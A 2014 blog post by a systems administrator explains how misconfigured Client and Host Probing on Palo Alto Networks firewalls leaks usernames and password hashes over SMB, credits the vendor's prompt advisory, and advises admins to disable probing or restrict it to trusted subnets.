Wednesday, October 22, 2014

A significant number Palo Alto Networks (PAN) firewalls are leaking critical information onto the open internet. Its vital to immediately qualify that statement. The leaks result from firewall administrators enabling Client Probing and Host Probing within the User-ID settings without explicitly limiting such probes to a trusted "zone" or subnet. Username, domain name and password hash are provided to those initiating a properly formatted SMB connection to impacted firewalls.

Enabling such a configuration on a production firewall appliance, with its resulting leaks, results in a somewhat unusual situation where responsibility for the resulting vulnerability ought to be shared between security administrators and PAN developers. SMB probing should be filtered to trusted subnets; this is obvious. That said, such a setting should not be essentially encouraged through the user interface. It would be trivial to produce and error or warning message when saving of a configuration that allows SMB probing to the WAN. Clearly there was an oversight on the part of PAN here.

To their credit, PAN has released an advisory to their customers, and has done so promptly. Even more to their credit, they cited Moore's original post in their own. Honesty and transparency of this nature is rare and should be applauded. Its tough to own up when you screw up, but PAN appears to have done just that.

Its a simple problem with a simple solution, admins. Disable Probing on your PAN appliance, or ensure that SMB probes are filtered to a secure subnet. An explicit how-to on that task is available here.

About Me

Joshua Wieder has been a systems administrator for close to 10 years - specializing in data center and hosting infrastructure using redhat linux, cisco ios, vmware, KVM and containers such as docker and kubernetes. Get in touch with Josh Wieder here on Google+ or using one of the websites on the links page.